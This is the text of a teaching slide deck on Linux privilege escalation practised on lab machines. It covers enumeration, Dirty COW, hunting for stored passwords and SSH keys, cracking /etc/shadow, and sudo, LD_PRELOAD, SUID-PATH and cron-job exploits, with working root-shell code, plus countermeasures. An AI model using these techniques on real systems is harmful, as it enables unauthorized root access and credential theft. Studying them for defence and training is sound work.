LINUX PRIVILEGE ESCALATION

NAYLA GREIGE

ABOUT ME

COMPUTER ENGINEER WITH A MASTERS DEGREE IN NETWORKING

LAB INSTRUCTOR & SUPERVISOR FOR THE CYBECURITY AND NETWORKING LABORATORY AT THE UNIVERSITY OF BALAMAND

REMARKS BEFORE STARTING

• ALL DEMOS WERE PERFORMED IN THE TRYHACKME ROOM.
• TO SET UP YOUR OWN ENVIRONMENT, YOU CAN INSTALL THE MR. ROBOT VULNERABLE MACHINE FROM VULNHUB: MR. ROBOT 1 ON VULNHUB.

THIS MACHINE PROVIDES AN ENVIRONMENT FOR PRACTICING AND LEARNING ABOUT VULNERABILITIES AND PRIVILEGE ESCALATION TECHNIQUES.

​

AGENDA

• BRIEF OVERVIEW

• ENUMERATION

• AUTOMATED TOOLS

• PRIVILEGE ESCALATION: KERNEL EXPLOITS

• PRIVILEGE ESCALATION: PASSWORDS & FILE PERMISSIONS

• PRIVILEGE ESCALATION: SUDO

• PRIVILEGE ESCALATION: SUID

• PRIVILEGE ESCALATION: CRON JOBS

• COUNTERMEASURES

BRIEF OVERVIEW

DEFINITION

PRIVILEGE ESCALATION REFERS TO GAINING ELEVATED ACCESS ON A LINUX SYSTEM BEYOND WHAT A USER IS TYPICALLY AUTHORIZED TO DO.

​

CONSEQUENCES:

• DELETE FILES
• VIEW SENSITIVE INFORMATION
• INSTALL UNWANTED PROGRAMS
• CHANGE SYSTEM SETTINGS

​

TYPES OF PRIVILEGE ESCALATION

• VERTICAL PRIVILEGE ESCALATION:

MOVING FROM A LOWER PRIVILEGE (NORMAL USER) TO A HIGHER PRIVILEGE (ROOT/ADMINISTRATOR).

GRANTS FULL CONTROL OVER THE SYSTEM.

​

• HORIZONTAL PRIVILEGE ESCALATION:

MOVING TO ANOTHER USER’S PRIVILEGES WITHOUT ROOT ACCESS.

ACCESSING FILES OR EXECUTING ACTIONS AS ANOTHER USER.

​

TECHNIQUES :

A MULTITUDE OF PRIVILEGE ESCALATION TECHNIQUES ARE AVAILABLE:

• Kernel Exploits
• Password Hunting
• File Permissions
• Sudo Attacks
• Shell Escaping
• LD_PRELOAD
• SUID Attack
• Environment Variables
• Capabilities Attacks
• Scheduled Tasks
• NFS
• Docker

​

ENUMERATION

DEFINITION

ENUMERATION REFERS TO THE PROCESS OF GATHERING DETAILED INFORMATION ABOUT A TARGET SYSTEM ONCE IT'S DISCOVERED TO BE ALIVE AND ACCESSIBLE (E.G., DURING THE SCANNING PHASE).

​

IT’S LIKE DIGGING DEEPER INTO THE TARGET MACHINE IN ORDER TO COLLECT MORE INFORMATION ABOUT IT.

​

​

SYSTEM ENUMERATION

NETWORK ENUMERATION

USER ENUMERATION

PASSWORD ENUMERATION

• UNAME -A: DISPLAYS KERNEL VERSION AND SYSTEM ARCHITECTURE.
• LSCPU: PROVIDES DETAILS ABOUT THE CPU, SUCH AS CORES AND THREADS.
• PS AUX: LISTS ALL RUNNING PROCESSES, SIMILAR TO TASK MANAGER IN WINDOWS.
• HOSTNAME: RETURNS THE HOSTNAME OF THE TARGET MACHINE
• CAT /PROC/VERSION: DISPLAYS INFORMATION ABOUT THE LINUX KERNEL VERSION AND THE SYSTEM'S BUILD DETAILS.
• CAT /ETC/ISSUE : SHOWS THE SYSTEM IDENTIFICATION (SUCH AS THE LINUX DISTRIBUTION AND VERSION) THAT APPEARS BEFORE THE LOGIN PROMPT

​

SYSTEM ENUMERATION :

LINUX COMMANDS DEMO

• WHOAMI: DISPLAYS CURRENT USER
• id: SHOWS what our user id is AND group id
• sudo -l: Lists commands the user can run as root
• cat /etc/passwd: Lists all users on the system.
• cat /etc/shadow: shows the encrypted passwords and account details for users on a Linux system.
• CAT /ETC/GROUP: DEFINES THE GROUPS TO WHICH USERS BELONG
• history: Shows previously executed commands, which may contain sensitive information.

​

USER ENUMERATION:

username:placeholder:uid:gid:text description:home directory:shell

PASSWD FILE

cat /etc/passwd | cut -d : -f 1

username:encrypted password (hash):last change:expiration info

​

SHADOW FILE

ONLY ACCESSIBLE BY ROOT FOR SECURITY REASONS

-rw------- 1 root root 1.2K Jan 30 10:00 /etc/shadow

groupname:group password:gid:users in the group

​

GROUP FILE

• IFCONFIG: DISPLAYS IP ADDRESSES AND NETWORK INTERFACES
• NETSTAT: SHOWS ACTIVE CONNECTIONS AND LISTENING PORTS
• NETSTAT -A: SHOWS ALL LISTENING PORTS AND ESTABLISHED CONNECTIONS.
• NETSTAT -AT OR NETSTAT -AU CAN ALSO BE USED TO LIST TCP OR UDP PROTOCOLS RESPECTIVELY.
• NETSTAT -L: LIST PORTS IN “LISTENING” MODE. THESE PORTS ARE OPEN AND READY TO ACCEPT INCOMING CONNECTIONS.
• ARP -A: LISTS DEVICES ON THE LOCAL NETWORK
• IP ROUTE: SEES WHICH NETWORK ROUTES EXIST

​

NETWORK ENUMERATION :

• NMAP: SCANS HOSTS AND SERVICES ON A NETWORK ON A PARTICULAR PORT
• NMAP -SN: PINGS A NETWORK TO SEE WHICH DEVICES ARE ONLINE.
• NMAP -P: SCANS FOR OPEN PORTS ON A SPECIFIC MACHINE.
• NETDISCOVER -R: QUICKLY DISCOVERS LIVE DEVICES ON THE LOCAL NETWORK.

​

NETWORK ENUMERATION:

PASSWORD ENUMERATION:

WHEN SEARCHING FOR SENSITIVE FILES LIKE SSH KEYS OR PASSWORDS, IT'S IMPORTANT TO USE EFFECTIVE METHODS TO LOCATE THEM SECURELY.

​

COMMANDS LIKE GREP, LOCATE, AND FIND ARE USEFUL TO SEARCH FOR SPECIFIC TERMS, SUCH AS "PASSWORD" OR SSH-RELATED FILES.

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

​

PASSWORD ENUMERATION:

TO SEARCH FOR THE WORD "PASSWORD" ANYWHERE IN FILES AND HIGHLIGHT THE OCCURRENCES IN RED TO IDENTIFY EASILY

grep --color=auto -rnw '/' -ie "PASSWORD=" --color=always 2> /dev/null

TO NARROW DOWN OUR RESULTS AND SEARCH FOR PASSWORD ASSIGNMENTS

locate password | more

TO LOCATE A FILE CONTAINING NAME PASSWORD

​

USER ENUMERATION:

• SUID:

THE SUID BIT ALLOWS THE FILE TO RUN WITH THE PRIVILEGE LEVEL OF THE ACCOUNT THAT OWNS IT, RATHER THAN THE ACCOUNT WHICH RUNS IT.

TO FIND FILES WITH THE SUID BIT, WHICH ALLOW US TO RUN THE FILE WITH A HIGHER PRIVILEGE LEVEL THAN THE CURRENT USER.

​

find / -perm -u=s -type f 2>/dev/null

USE LS -L TO VIEW FILE OR DIRECTORY PERMISSIONS.

USER ENUMERATION:

• SUID:

REPRESENTED BY REPLACING THE OWNER’S EXECUTE BIT (X) WITH (S)

=> ALLOWS EXECUTING THE FILE AS THE FILE OWNER.

​

• SGID (SET GROUP ID):

SIMILAR TO SUID BUT APPLIES TO THE GROUP.

REPRESENTED BY REPLACING THE GROUP’S EXECUTE BIT (X) WITH (S).

=> ALLOWS EXECUTING THE FILE WITH THE GROUP’S PERMISSIONS.

​

USER ENUMERATION:

-RWXR-XR--

FOR FILE PERMISSIONS

DRWXR-XR--

FOR DIRECTORY PERMISSIONS

OWNER

GROUP

OTHERS

RWX

R-X

R--

SUID

OWNER

GROUP

OTHERS

RWS

R-X

R--

SGID

OWNER

GROUP

OTHERS

RWX

R-S

R--

USER ENUMERATION:

find / -perm -o x -type d 2>/dev/null

FIND WORLD-EXECUTABLE FOLDERS

find / -perm -o w -type d 2>/dev/null

FIND WORLD-WRITABLE FOLDERS

find / -perm -u=s -type f 2>/dev/null

FIND FILES WITH THE SUID BIT, WHICH ALLOWS US TO RUN THE FILE WITH A HIGHER PRIVILEGE LEVEL THAN THE CURRENT USER

AUTOMATED TOOLS

AUTOMATED TOOLS

• TOOLS ENHANCE SEARCH CAPABILITIES, FINDING VULNERABILITIES FASTER AND MORE EFFICIENTLY THAN MANUAL METHODS.
• THE TARGET SYSTEM’S ENVIRONMENT WILL INFLUENCE THE TOOL YOU WILL BE ABLE TO USE. FOR EXAMPLE, YOU WILL NOT BE ABLE TO RUN A TOOL WRITTEN IN PYTHON IF IT IS NOT INSTALLED ON THE TARGET SYSTEM.
• THIS IS WHY IT WOULD BE BETTER TO BE FAMILIAR WITH A FEW RATHER THAN HAVING A SINGLE GO-TO TOOL.

​

AUTOMATED TOOLS

• LINPEAS: A POWERFUL LINUX PRIVILEGE ESCALATION SCRIPT.
• COLOR-CODED OUTPUT, HUNTS VULNERABILITIES, AND GATHERS EXTENSIVE SYSTEM INFORMATION.
• EASY TO INSTALL (.SH FILE, NO DEPENDENCIES).
• LINENUM.SH: SIMILAR TO LINPEAS, ENUMERATES SYSTEM DETAILS.
• LINUX EXPLOIT SUGGESTER: SUGGESTS POTENTIAL EXPLOITS BASED ON SYSTEM READINGS.
• LINUX PRIV CHECKER.PY: UPDATED TOOL FOR PYTHON ENVIRONMENTS, IDEAL WHEN OTHER METHODS FAIL.

​

AUTOMATED TOOLS

KEY FINDINGS INCLUDE:

• KERNEL EXPLOITS (VIA VERSION INFORMATION).
• SUDO INFO, SYSTEM INFO, AND PATH DETAILS.
• MISCONFIGURATIONS IN CRON JOBS OR NETWORK SETTINGS.
• WRITABLE FILES OR POTENTIAL PASSWORDS.
• HIGH RISK INDICATORS:
• RED (EXPLOITABLE ISSUES) AND YELLOW (POSSIBLE ISSUES) HIGHLIGHT VULNERABLE AREAS.

AUTOMATED TOOLS

• LINPEAS: HTTPS://GITHUB.COM/CARLOSPOLOP/PRIVILEGE-ESCALATION-AWESOME-SCRIPTS-SUITE/TREE/MASTER/LINPEAS
• LINENUM: HTTPS://GITHUB.COM/REBOOTUSER/LINENUM
• LES (LINUX EXPLOIT SUGGESTER): HTTPS://GITHUB.COM/MZET-/LINUX-EXPLOIT-SUGGESTER
• LINUX SMART ENUMERATION: HTTPS://GITHUB.COM/DIEGO-TREITOS/LINUX-SMART-ENUMERATION
• LINUX PRIV CHECKER: HTTPS://GITHUB.COM/LINTED/LINUXPRIVCHECKER

​

PRIVILEGE ESCALATION: KERNEL EXPLOITS

​

KERNEL EXPLOITS

• DEFINITION: THE KERNEL IS THE CORE COMPONENT OF AN OPERATING SYSTEM (LIKE LINUX), ACTING AS A BRIDGE BETWEEN THE HARDWARE AND SOFTWARE.
• FUNCTIONS:

- MANAGING HARDWARE: CONTROLS MEMORY, CPU, AND STORAGE DEVICES.

- RUNNING PROGRAMS: ALLOCATES RESOURCES AND ENSURES SMOOTH EXECUTION.

- SECURITY AND PERMISSIONS: ENFORCES ACCESS CONTROL TO SECURE THE SYSTEM.

​

KERNEL EXPLOITS

THE KERNEL SITS BETWEEN APPLICATIONS AND HARDWARE (MEMORY, CPU, DEVICES).

IT IS LIKE THE "MANAGER" OF THE SYSTEM, ENSURING EVERYTHING RUNS SMOOTHLY AND SECURELY.

​

KERNEL EXPLOITS

THE SIMPLE EXPLOIT PROCESS:

1. FIND THE KERNEL VERSION:

USE UNAME -A TO CHECK THE VERSION OF THE KERNEL.

2. SEARCH FOR EXPLOITS:

LOOK FOR EXPLOITS THAT WORK WITH THAT VERSION OF THE KERNEL (USING GOOGLE, GITHUB, OR TOOLS LIKE EXPLOIT-DB, OR SEARCHSPLOIT).

3. RUN THE EXPLOIT:

ONCE YOU FIND THE EXPLOIT,DOWNLOAD, COMPILE AND RUN THE EXPLOIT CODE TO ESCALATE PRIVILEGES.

​

PRACTICAL EXAMPLE: DIRTY COW

​

WHAT IS DIRTY COW?

• DIRTY COW (COPY-ON-WRITE) IS

A VULNERABILITY FOUND IN OLDER

LINUX KERNELS (VERSIONS 2.6.22

TO 3.9).

• IT ALLOWS ATTACKERS TO OVERWRITE PROTECTED MEMORY AND ESCALATE PRIVILEGES.

​

KERNEL EXPLOITS

KERNEL EXPLOITS

1. CHECK FOR ANY POTENTIAL EXPLOITS BASED ON YOUR SYSTEM'S CONFIGURATION.

​

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

OR MANUALLY CHECK YOUR KERNEL VERSION TO SEARCH AFTER FOR THE EXPLOIT

uname -a

2. DOWNLOAD, COMPILE AND RUN

./c0w

passwd

id

3. IN COMMAND PROMPT TYPE

4. IN COMMAND PROMPT TYPE

5. IN COMMAND PROMPT TYPE

KERNEL EXPLOITS

PRIVILEGE ESCALATION: PASSWORDS & FILE PERMISSIONS

PRIVILEGE ESCALATION

VIA

STORED PASSWORDS

PRIVILEGE ESCALATION

VIA

WEAK FILE PERMISSIONS

​

PRIVILEGE ESCALATION

VIA

SSH KEYS

​

PRIVILEGE ESCALATION via Stored Passwords

​

METHODS TO FIND STORED PASSWORDS:

• TO CHECK THE SHELL HISTORY FOR PASSWORDS OR SENSITIVE COMMANDS. THIS FILE COMMONLY EXISTS ON ALL LINUX MACHINES

​

• TO SEARCH FOR THE WORD "PASSWORD" IN FILES ACROSS THE SYSTEM

​

• LINPEAS: AUTOMATED TOOL TO QUICKLY SCAN FOR PASSWORDS.

​

grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null

history

PRIVILEGE ESCALATION via Stored Passwords

​

PRACTICAL EXAMPLE - USING HISTORY:

• IN COMMAND PROMPT TYPE:

cat ~/.bash_history | grep -i passw

Password found in history:

su root with password password123.

​

PRIVILEGE ESCALATION via Stored Passwords

​

PRACTICAL EXAMPLE - USING CONFIG FILES SUCH AS OPENVPN:

• ASSUMING THAT OUR VULNERABLE MACHINE HAS OPENVPN INSTALLED, IN COMMAND PROMPT TYPE:

cat /home/user/myvpn.ovpn

cat /etc/openvpn/auth.txt

• WE CAN SEE THAT CREDENTIALS ARE EXPOSED IN THE OPENVPN AUTH FILE

PRIVILEGE ESCALATION VIA STORED PASSWORDS

PRIVILEGE ESCALATION via weak File Permissions

​

• Weak File Permissions: IF a user has access to modify or read files that he shouldn’t
• Example:
• /etc/passwd (readable by all users).
• /etc/shadow (should be restricted to root only).

​

​

PRIVILEGE ESCALATION VIA WEAK FILE PERMISSIONS

PRACTICAL EXAMPLE -/ETC/SHADOW READABLE BY ANYONE

• IN COMMAND PROMPT TYPE AND COPY THE RESULTS TO A FILE ON YOUR ATTACKER MACHINE :

cat /etc/passwd > passwd.txt

cat /etc/shadow > shadow.txt

• ON YOUR ATTACKER MACHINE TYPE:

unshadow passwd.txt shadow.txt > unshadowed.txt

USE THE WORDLIST TO CRACK HASHES

hashcat -m 1800 unshadowed.txt rockyou.txt -O

PRIVILEGE ESCALATION VIA WEAK FILE PERMISSIONS

PRIVILEGE ESCALATION via ssh keys

​

SSH KEYS ARE A SAFE WAY TO ACCESS REMOTE SYSTEMS WITHOUT NEEDING A PASSWORD.

THEY WORK USING TWO KEYS:

• A PRIVATE KEY (ID_RSA) KEPT ON YOUR LOCAL MACHINE
• A PUBLIC KEY SAVED ON THE REMOTE MACHINE IN A FILE CALLED AUTHORIZED_KEYS.

WHEN YOU TRY TO LOG IN, THE REMOTE SYSTEM CHECKS IF THE PRIVATE KEY MATCHES THE PUBLIC KEY TO ALLOW ACCESS.

THIS METHOD IS MORE SECURE THAN PASSWORDS BECAUSE IT RELIES ON UNIQUE KEYS FOR VERIFICATION

​

PRIVILEGE ESCALATION via ssh keys

​

IN COMMAND PROMPT TYPE:

find / -name authorized_keys 2> /dev/null

find / -name id_rsa 2> /dev/null

NOTHING RETURNED

A BACKUP SUPER SECRET KEYS ID RSA IS FOUND

​

COPY THE CONTENTS OF THE DISCOVERED ID_RSA FILE TO A FILE ON YOUR ATTACKER VM

ON YOUR ATTACKER MACHINE, IN COMMAND PROMPT TYPE:

ssh -i id_rsa root@<victim_ip>

chmod 400 id_rsa

INTEAD OF USING A PASSWORD WE ARE USING A PRIVATE KEY

PRIVILEGE ESCALATION VIA SSH KEYS

PRIVILEGE ESCALATION: SUDO

​

PRIVILEGE ESCALATION SUDO (SHELL ESCAPING)

​

PRIVILEGE ESCALATION SUDO (ABUSING INTENDED FUNCTIONALITY)

PRIVILEGE ESCALATION SUDO (LD_PRELOAD)

PRIVILEGE escalation via sudo (shell escaping)

​

• SUDO: A COMMAND THAT LETS USERS EXECUTE PROGRAMS WITH ROOT PRIVILEGES.THEREFORE USERS OR GROUPS CAN BE GIVEN THE ABILITY TO RUN CERTAIN COMMANDS AS ROOT.

​

• COMMAND TO CHECK PRIVILEGES:

SUDO -L - LISTS COMMANDS A USER CAN RUN AS ROOT.

• PRIVILEGE ESCALATION CAN BE ACHIEVED BY EXPLOITING MISCONFIGURED SUDOERS SETTINGS.

​

CHOOSE ONE OF THE LISTED BINARIES AND SEARCH FOR IT ON GTFOBINS.

​

GTFOBINS IS A RESOURCE THAT SHOWS HOW COMMON BINARIES CAN BE EXPLOITED FOR PRIVILEGE.

IF THE BINARY IS LISTED WITH "SUDO" AS A FUNCTION, YOU CAN USE IT TO ELEVATE PRIVILEGES, USUALLY VIA AN ESCAPE SEQUENCE.

PRIVILEGE ESCALATION via sudo (shell escaping)

​

IN COMMAND PROMPT TYPE THE BELOW CMD TO LIST THE BINARIES YOU CAN RUN AS ROOT

sudo -l

SEARCH FOR THE CMDS TO GET ROOT PRIVILEGE WITH THE HELP OF GTFOBINS

PRIVILEGE ESCALATION via sudo (shell escaping)

​

LET ‘S SUPPOSE THE FIND BINARY IS AVAILABLE IN SUDO -L

COPY PASTE THE CMD TO YOUR VICTIM MACHINE AND YOU WILL GAIN ACCESS TO THE ROOT SHELL

PRIVILEGE ESCALATION VIA SUDO (SHELL ESCAPING)

PRIVILEGE escalation via sudo (Abusing Intended Functionality)

SOME APPLICATIONS LIKE APACHE2 MAY NOT HAVE A KNOWN EXPLOIT. HOWEVER ATTACKER CAN MANAGE TO USE INDIRECT METHODS .

​

FOR EXAMPLE, APACHE2 HAS AN OPTION (-F) THAT ALLOWS IT TO LOAD A DIFFERENT CONFIGURATION FILE.

IF YOU TRY TO LOAD THE /ETC/SHADOW FILE (WHICH CONTAINS SENSITIVE INFORMATION LIKE PASSWORD HASHES), APACHE2 WILL PRODUCE AN ERROR. THIS ERROR MESSAGE CAN CAUSE AN ERROR THAT ACCIDENTALLY REVEALS SENSITIVE INFORMATION LIKE THE ROOT’S USER ACCOUNT

​

PRIVILEGE escalation via sudo (Abusing Intended Functionality)

ON THE VICTIM MACHINE , CONSIDERING THAT APACHE2 IS AVAILABLE IN SUDO -L , TYPE:

sudo apache2 -f /etc/shadow

ON THE ATTACKER MACHINE

echo '[Pasted Root Hash]' > hash.txt

john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

FROM THE OUTPUT, COPY THE ROOT HASH

PRIVILEGE ESCALATION VIA SUDO (ABUSING INTENDED FUNCTIONALITY

PRIVILEGE escalation via sudo (LD_PRELOAD)

LD_PRELOAD IS AN ENVIRONMENT VARIABLE THAT ALLOWS ANY PROGRAM TO USE SHARED custom libraries.

IF THE "ENV_KEEP" OPTION IS ENABLED WE CAN GENERATE A SHARED LIBRARY WHICH WILL BE LOADED AND EXECUTED BEFORE THE PROGRAM IS RUN.

PRIVILEGE escalation via sudo (LD_PRELOAD)

OPEN A TEXT EDITOR AND TYPE

#include <stdio.h>

#include <sys/types.h> #include <stdlib.h>

​

void _init() {

unsetenv("LD_PRELOAD");

setgid(0);

setuid(0);

system("/bin/bash");

}

THIS IS SETTING THE GROUP ID AND USER ID TO 0 WHICH GIVES US PRIVILEGES AS ROOT USER.

SAVE THE FILE AS X.C TO COMPILE IT AND EXECUTE IT

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

sudo LD_PRELOAD=/tmp/x.so apache2

id

​

PRIVILEGE ESCALATION VIA SUDO (LD_PRELOAD)

PRIVILEGE ESCALATION: SUID

​

PRIVILEGE escalation : suid

SUID (SET USER ID) FILES ARE FILES THAT RUN WITH THE PERMISSIONS OF THEIR OWNER, OFTEN THE ROOT USER. THEY CAN POTENTIALLY BE USED FOR ATTACKS BECAUSE THEY run with elevated privileges.

​

WE WILL BE USING IN THIS SECTION THE BINARY (/USR/LOCAL/BIN/SUID-ENV).

IT INCLUDES CALLS TO SETRESUID AND SETRESGID, WHICH ARE OFTEN USED TO CHANGE USER OR GROUP IDS, POTENTIALLY TO ESCALATE PRIVILEGES.

SUID-ENV INHERITS THE PATH AND COULD BE EXPLOITED IF AN ATTACKER MANIPULATES IT

PRIVILEGE escalation : suid

IN COMMAND PROMPT TYPE

find / -type f -perm -04000 -ls 2>/dev/null

strings /usr/local/bin/suid-env

TO DISPLAY THE HUMAN-READABLE STRINGS EMBEDDED WITHIN THE BINARY FILE

IN COMMAND PROMPT TYPE

• echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > /tmp/service.c
• gcc /tmp/service.c -o /tmp/service
• export PATH=/tmp:$PATH
• /usr/local/bin/suid-env
• id

PRIVILEGE ESCALATION : SUID

PRIVILEGE ESCALATION: CRON JOBS

PRIVILEGE escalation : cron jobs

CRON JOBS ARE SCHEDULED TASKS ON A LINUX SYSTEM. THEY RUN AUTOMATICALLY AT SPECIFIC TIMES (E.G., BACKUPS OR CLEANING TEMPORARY FILES).

BY DEFAULT, THESE TASKS RUN WITH THE PERMISSIONS OF THE OWNER, WHICH CAN OFTEN BE ROOT (THE MOST PRIVILEGED USER ON A SYSTEM).

​

CRON JOBS CAN BE VULNERABLE IF THE SCRIPTS THEY RUN ARE NOT PROPERLY PROTECTED.

EXAMPLE: IF THERE IS A SCRIPT THAT RUNS EVERY MINUTE AND YOU CAN MODIFY THAT SCRIPT, YOU CAN MAKE IT RUN MALICIOUS COMMANDS AS ROOT.

​

​

PRIVILEGE escalation : cron jobs

IN COMMAND PROMPT TYPE

cat /etc/crontab

THIS GIVES YOU INSIGHT INTO WHAT TASKS ARE BEING RUN AND WHEN.

ls -l /usr/local/bin/overwrite.sh

• echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /usr/local/bin/overwrite.sh

• /tmp/bash -p

THIS FILE ECHOES DATE AND IT WILL SAVE IT TO THE TMP/USELESS FILE.

WE CAN SEE THAT WE WERE ABLE TO OVERWRITE IT

PRIVILEGE ESCALATION : CRON JOBS

COUNTERMEASURES

PROTECTION TIPS

• APPLY LEAST PRIVILEGE: GIVE USERS ONLY THE NECESSARY PERMISSIONS TO REDUCE ESCALATION RISKS
• PATCH AND UPDATE SYSTEMS: REGULARLY UPDATE SOFTWARE TO FIX VULNERABILITIES
• AUDIT AND LOG ACCESS: MONITOR PRIVILEGED ACCESS AND SET ALERTS FOR SUSPICIOUS ACTIVITY TO DETECT ATTACKS EARLY
• USE PASSWORD MANAGERS OR PAM: SECURE PASSWORDS TO AVOID EXPOSURE IN LOGS OR FILE

​

MR ROBOT DEMO

RESOURCES

• LINUX PRIVILEGE ESCALATION 101 (SLIDESHARE): https://www.slideshare.net/slideshow/linux-privilege-escalation-101/90407661
• Linux Privilege Escalation Blog - Delinea: https://delinea.com/blog/linux-privilege-escalation
• A Walkthrough on Linux Privilege Escalation - Medium: https://medium.com/@chommykendra/a-walkthrough-on-linux-privilege-escalation-from-tryhackme-as-a-guide-e1a1f79f7f90
• Linux Privilege Escalation Fundamentals - Bugbase.ai: https://bugbase.ai/blog/linux-privilege-escalation-fundamentals
• Linux Privilege Escalation Part 1 - Medium: https://medium.com/@Varma_Chekuri/linux-privilege-escalation-part-1-c35b6c5b4841
• Learn Linux Privilege Escalation - G0dl3v3l: https://g0dl3v3l.com/learn-linux-privilege-escalation-the-fun-way-b4ee16d6e35e

GUIDES/WALKTHROUGHS

​

• Linux Kernel CVEs - Linux Kernel CVEs Database: https://www.linuxkernelcves.com/cves
• Gtfobins (Privilege Escalation Via Sudo) - Website: Https://Gtfobins.Github.Io/#+Sudo
• Explainshell (Explaining Shell Commands): HTTPS://EXPLAINSHELL.COM/EXPLAIN?CMD=FIND+%2F+-TYPE+F+-PERM+-04000+-LS+2%3E%2FDEV%2FNULL

​

​

• TryHackMe - Linux Privesc Arena: https://tryhackme.com/r/room/linuxprivescarena
• TRYHACKME - Linux Privesc: https://tryhackme.com/r/room/linprivesc
• Hack The Box (General Hacking Challenges): https://www.hackthebox.com/

EXPLOIT DATABASES AND TOOLS

CTF/PRACTICE PLATFORMS

​

• Kernel Exploits Repository - Github: HTTPS://GITHUB.COM/LUCYOA/KERNEL-EXPLOITS
• Peass-ng (Linux Privilege Escalation Scripts) - Github: HTTPS://GITHUB.COM/PEASS-NG/PEASS-NG/TREE/MASTER/LINPEAS
• Linux Exploit Suggester - Github: HTTPS://GITHUB.COM/THE-Z-LABS/LINUX-EXPLOIT-SUGGESTER

GITHUB REPOSITORIES

VIDEOS

• Linux Privilege Escalation - Part 1: HTTPS://WWW.YOUTUBE.COM/WATCH?V=VRMRK82TVTK
• Linux Privilege Escalation - Part 2: HTTPS://WWW.YOUTUBE.COM/WATCH?V=YMBEYZVK9HS

• Mr. Robot V1 Challenge Walkthrough - Blogspot: HTTPS://RGOLEBIOWSKI.BLOGSPOT.COM/2016/06/MR-ROBOT-V1-CHALLENGE.HTML
• Mr. Robot 1 Vulnhub Challenge - Vulnhub: HTTPS://WWW.VULNHUB.COM/ENTRY/MR-ROBOT-1,151/

BLOGS AND WRITE-UPS

THANKYOU

NAYLA GREIGE